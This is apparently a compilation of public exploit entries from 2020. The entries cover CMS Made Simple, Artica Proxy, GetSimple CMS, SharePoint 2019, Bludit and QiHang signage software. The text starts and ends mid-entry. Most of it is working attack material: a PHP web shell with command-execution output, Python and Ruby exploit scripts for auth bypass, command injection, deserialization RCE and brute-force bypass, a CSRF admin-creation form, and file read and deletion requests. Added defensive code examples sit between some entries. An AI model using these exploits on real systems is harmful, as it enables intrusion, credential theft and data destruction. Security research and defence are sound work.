Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529
Upgrade-Insecure-Requests: 1

5. Timeline:
----------------------
2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7
2020-08-02: Reported vulnerability to vendor
2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8
-
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2020-07-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: N/A

1. Description:
----------------------
CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.

2. Proof of Concept:
----------------------
- Create .phtml or .ptar file with malicious PHP payload;
- Upload .phtml or .ptar file in the 'File Manager' module;
- Click on the uploaded file to perform remote code execution.

3: Example payload:
----------------------
<?php system($_GET['cmd']);?>

4a: Burp request:
----------------------
GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
Host: 10.10.10.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v
Upgrade-Insecure-Requests: 1

4b: Burp response:
----------------------
HTTP/1.1 200 OK
Date: Thu, 30 Jul 2020 23:14:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html; charset=UTF-8

uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
Artica Proxy 4.3.0 - Authentication Bypass
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506

import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)
    return session


def run_command(session, args):
    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
    print("[+] Running command: {}".format(args.command))
    response = session.post(args.host + cmd_endpoint, verify=False)
    soup = BeautifulSoup(response.text, "html.parser")
    print(soup.find_all("code")[1].get_text())


def main():
    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    parser.add_argument(
        "--host",
        help="The host to target. Format example: https://host:port",
    )
    parser.add_argument("--command", help="The command to run")
    args = parser.parse_args()

    if not args.host or not args.command:
        parser.print_help()
        exit(0)

    session = requests.Session()
    session = bypass_auth(session, args)
    run_command(session, args)


if __name__ == "__main__":
    main()
-
GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-12
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)

# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via an authenticated admin visiting a third-party site.

## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password

## CSRF POST Form Method
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
      <input type="hidden" name="usernamec" value="<ADMIN>" />
      <input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />
      <input type="hidden" name="ntimezone" value="" />
      <input type="hidden" name="userlng" value="en_US" />
      <input type="hidden" name="userpassword" value="<PASSWORD>" />
      <input type="hidden" name="usereditor" value="1" />
      <input type="hidden" name="Landing" value="" />
      <input type="hidden" name="add-user" value="Add New User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
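The form above succeeds because the add-user handler accepts any POST that arrives with the admin's session cookie. The following is an added example (not GetSimple or Multi User plugin code, not the advisory authors'): a session-bound CSRF token and a hypothetical handler that refuses the posted field set without it. The secret, session ids, field dictionary and function names are constructed.

```python
# Added example (not GetSimple / Multi User code): a session-bound CSRF token
# for the add-user form and a handler that refuses requests without it.
# Secret, session ids, form dictionary and handler names are constructed.
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)      # per-deployment secret, generated at start
FORM_NAME = "user-management"


def issue_csrf_token(session_id, form_name=FORM_NAME):
    """Token bound to the session and the form; rendered as a hidden field
    into the admin page, which a third-party origin cannot read."""
    msg = ("%s:%s" % (session_id, form_name)).encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, submitted, form_name=FORM_NAME):
    if not submitted:
        return False
    expected = issue_csrf_token(session_id, form_name)
    return hmac.compare_digest(expected, submitted)   # constant-time comparison


def handle_add_user(session_id, form):
    """Hypothetical server-side handler for the fields the forged form posts.

    A cross-site POST rides on the victim's cookie (hence session_id) but
    cannot supply a token that matches that session, so it stops here."""
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "rejected: missing or invalid CSRF token"
    if form.get("add-user") != "Add New User":
        return 400, "bad request"
    return 200, "user %s created" % form["usernamec"]


# Constructed: the field set from the forged form above, carrying no token.
FORGED_FORM = {
    "usernamec": "<ADMIN>",
    "useremail": "ADMIN@DOMAIN.LOCAL",
    "ntimezone": "",
    "userlng": "en_US",
    "userpassword": "<PASSWORD>",
    "usereditor": "1",
    "Landing": "",
    "add-user": "Add New User",
}
```

Marking the session cookie `SameSite=Lax` is a useful second layer (a cross-site POST would then arrive without the cookie at all), but the token check is what makes the handler safe on its own.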
-
Microsoft SharePoint Server 2019 - Remote Code Execution
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016, SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seeley and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
from urllib import quote, unquote
import logging


class Exploit:
    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    gadget = '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'
    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    control_path = control_path_quicklinks

    def __init__(
            self,
            redirect=False,
            proxy_address='',
            username='',
            domain='',
            password='',
            target=''
    ):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } \
            if proxy_address is not None \
            and proxy_address != '' else {}
        self.headers = {}
        self.query_params = {
            'Mode': "Suggestion"
        }
        self.form_values = {
            '__viewstate': '',
            '__SUGGESTIONSCACHE__': ''
        }
        self.cookies = {}
        self.payload = """\
<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <ExpandedElement/>
          <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
              <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
          </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def parse_page(self, content):
        soup = BeautifulSoup(content, 'lxml')
        for key, val in self.form_values.iteritems():
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' % (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' % (key, str(error)))
        return self

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        # strip newlines, then collapse runs of spaces to a single space
        payload = payload\
            .replace('\n', '')\
            .replace('\r', '')
        while '  ' in payload:
            payload = payload\
                .replace('  ', ' ')
        return payload

    def get_form(self):
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='', help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020')
        parser.add_argument('-both', action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
        parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False')
        parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080')

        if len(argv) == 1:
            parser.print_help()
            exit(1)

        options = parser.parse_args()
        exp = Exploit(
            proxy_address=options.proxy,
            username=options.username,
            domain=options.domain,
            password=options.password,
            target=options.target
        )

        if options.debug:
            exp.debug()

        stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
            options.target,
            options.username,
            options.domain,
            options.password,
            options.debug,
            options.proxy
        ))

        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])

        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)

    except Exception as error:
        stderr.write('error in main %s' % str(error))
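The payload's hook is the `msdata:DataType` attribute in the DataSet schema, which names an arbitrary .NET type for the column. Below is an added example (not the advisory's code and not a SharePoint or .NET component): an inspection gate, of the kind a reverse proxy or pre-parse filter could apply, that rejects DataSet XML whose schema declares a column type outside a primitive allow-list. The allow-list, the template document and the function names are constructed; the gadget type string is the one from the payload above.

```python
# Added example (not SharePoint/.NET code): reject DataSet XML whose schema
# declares a column msdata:DataType outside a primitive allow-list, the
# attribute the payload above abuses. Allow-list, template and names constructed.
import xml.etree.ElementTree as ET

MSDATA_NS = "urn:schemas-microsoft-com:xml-msdata"
DATATYPE_ATTR = "{%s}DataType" % MSDATA_NS

# Hypothetical allow-list: the value types a list/table column may carry.
SAFE_DATATYPES = {
    "System.String", "System.Boolean", "System.Int16", "System.Int32",
    "System.Int64", "System.Double", "System.Decimal", "System.DateTime",
    "System.Guid", "System.Byte[]",
}

# Constructed DataSet document with one column whose DataType is filled in.
SCHEMA_TEMPLATE = """<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
             xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="col" msdata:DataType="{DATATYPE}" type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
</DataSet>"""

# The assembly-qualified type name from the payload above.
GADGET_TYPE = (
    "System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, "
    "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"
    "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "
    "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "
    "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
)


def make_dataset(datatype):
    """Constructed sample document with the given column DataType."""
    return SCHEMA_TEMPLATE.replace("{DATATYPE}", datatype)


def declared_datatypes(xml_text):
    """Every msdata:DataType attribute value anywhere in the document."""
    root = ET.fromstring(xml_text)
    return [el.get(DATATYPE_ATTR) for el in root.iter() if el.get(DATATYPE_ATTR) is not None]


def unsafe_datatypes(xml_text):
    """DataType values whose type name is not allow-listed. The assembly
    qualification after the first comma is ignored; only the type is judged."""
    bad = []
    for dt in declared_datatypes(xml_text):
        type_name = dt.split(",")[0].strip()
        if type_name not in SAFE_DATATYPES:
            bad.append(type_name)
    return bad


def dataset_is_acceptable(xml_text):
    """False for unparsable input as well: fail closed."""
    try:
        return not unsafe_datatypes(xml_text)
    except ET.ParseError:
        return False
```

In production the parsing step itself should use a hardened parser (for Python, `defusedxml`) so that the gate cannot be bypassed with entity expansion or external entities before the type check runs.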
-
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
#!/usr/bin/env ruby

## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
## Author: noraj (Alexandre ZANNI)
## Author website: https://pwn.by/noraj/
## Date: 2020-08-16
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: <= 3.9.2
## Tested on: Bludit Version 3.9.2

# Vulnerability
## Discoverer: Rastating
## Discoverer website: https://rastating.github.io/
## CVE: CVE-2019-17240
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240
## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
## Patch: https://github.com/bludit/bludit/pull/1090

require 'httpclient'
require 'docopt'

# dirty workaround to remove this warning:
# Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
# see https://github.com/nahi/httpclient/issues/252
class WebAgent
  class Cookie < HTTP::Cookie
    def domain
      self.original_domain
    end
  end
end

def get_csrf(client, login_url)
  res = client.get(login_url)
  csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
end

def auth_ok?(res)
  HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location'])
end

def bruteforce_auth(client, host, username, wordlist)
  login_url = host + '/admin/login'
  File.foreach(wordlist).with_index do |password, i|
    password = password.chomp
    csrf_token = get_csrf(client, login_url)
    headers = {
      'X-Forwarded-For' => "#{i}-#{password[..4]}",
    }
    data = {
      'tokenCSRF' => csrf_token,
      'username' => username,
      'password' => password,
    }
    puts "[*] Trying password: #{password}"
    auth_res = client.post(login_url, data, headers)
    if auth_ok?(auth_res)
      puts "\n[+] Password found: #{password}"
      break
    end
  end
end

doc = <<~DOCOPT
  Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass

  Usage:
    #{__FILE__} -r <url> -u <username> -w <path> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>          Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>    Username of the admin
    -w <path>, --wordlist <path>        Path to the wordlist file
    --debug                             Display arguments
    -H, --help                          Show this screen

  Examples:
    #{__FILE__} -r http://example.org -u admin -w myWordlist.txt
    #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  clnt = HTTPClient.new
  bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist'])
rescue Docopt::Exit => e
  puts e.message
end
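The bypass works because the lockout counter is keyed on an address derived from `X-Forwarded-For`, a header the client sets freely (the script above sends a new value on every attempt). The following is an added example (not Bludit code, not the script author's): a throttle keyed on the TCP peer, honouring the header only when the peer is a known reverse proxy. Proxy address, threshold, attempt list and function names are constructed.

```python
# Added example (not Bludit code): a login throttle keyed on the socket peer,
# trusting X-Forwarded-For only from a known reverse proxy. Proxy address,
# threshold, sample attempts and names are constructed here.
import ipaddress
from collections import defaultdict

TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}   # constructed: our one reverse proxy
MAX_FAILURES = 10                                       # lockout threshold per client key


def client_key(remote_addr, xff_header=None):
    """Address to throttle on.

    X-Forwarded-For is free text chosen by whoever sent the request. It is
    meaningful only when the peer is a proxy we operate and that proxy appends
    the real client as the last element (a single trusted hop is assumed)."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return str(peer)
    candidate = xff_header.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return str(peer)                 # malformed header: fall back to the peer


class LoginThrottle:
    def __init__(self, max_failures=MAX_FAILURES):
        self.max_failures = max_failures
        self.failures = defaultdict(int)

    def allowed(self, key):
        return self.failures[key] < self.max_failures

    def record_failure(self, key):
        self.failures[key] += 1

    def record_success(self, key):
        self.failures.pop(key, None)


def run_attempts(throttle, remote_addr, attempts):
    """Replay (xff_header, password_correct) pairs from one socket peer and
    return how many of them reached the credential check at all."""
    reached = 0
    for xff, ok in attempts:
        key = client_key(remote_addr, xff)
        if not throttle.allowed(key):
            continue
        reached += 1
        if ok:
            throttle.record_success(key)
        else:
            throttle.record_failure(key)
    return reached


# Constructed: 25 wrong passwords, each with the rotating header the PoC sends.
ROTATING_ATTEMPTS = [("%d-passw" % i, False) for i in range(25)]
```

With this keying, rotating the header from an untrusted peer changes nothing: all 25 attempts share one key and only the first ten reach the password comparison.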
-
QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure


Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file '/xml/User/User.xml' and obtain administrative login information that allows for a successful authentication bypass attack.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5579
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php

27.07.2020

--


$ curl http://192.168.1.1/xml/User/User.xml
<?xml version="1.0" encoding="utf-8"?>
<Users>
  <User id="1" account="admin" password="admin" />
  <User id="2" account="dev" password="dev" />
</Users>
-
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion


Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST parameter.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5580
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php

27.07.2020

--


POST /QH.aspx HTTP/1.1
Host: 192.168.1.74:8090
Content-Length: 105
User-Agent: Eraser
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://192.168.1.74:8090
Referer: http://192.168.1.74:8090/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"]
-
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability


Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from an unauthenticated file disclosure vulnerability when input passed through the 'filename' parameter when using the download action or through the 'path' parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5581
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php

27.07.2020

--


Source code disclosure PoC:
---------------------------

GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: 192.168.1.74:8090
User-Agent: lfi_test.wrapper/2.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

--

HTTP/1.1 200 OK
Server: HowFor Web Server/5.6.0.0
Date: Sun, 26 Jul 2020 22:49:08 GMT
X-AspNet-Version: 4.0.30319
Content-Disposition: attachment;filename=QH.aspx
Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/zip
Content-Length: 463
Connection: Close

<%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>


Arbitrary file read:
--------------------

http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax
http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config


Directory contents disclosure:
------------------------------

POST /QH.aspx HTTP/1.1
Host: 192.168.1.74:8090
Content-Length: 62
User-Agent: lfi_test.wrapper/2.9
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

responderId=ResourceNewResponder&action=getAll&path=&fileName=

--

HTTP/1.1 200 OK
Server: HowFor Web Server/5.6.0.0
Date: Tue, 28 Jul 2020 23:51:13 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 4680
Connection: Close

{
  "first": true,
  "second": [
    {
      "name": "App_Data",
      "type": "folder",
      "size": 852992.0,
      "uploadTime": new Date( 1525316885250 ),
      "path": "/App_Data"
    },
    {
      "name": "bin",
      "type": "folder",
      "size": 4398172.0,
      "uploadTime": new Date( 1525316885046 ),
      ...
      ...
      "name": "xml",
      "type": "folder",
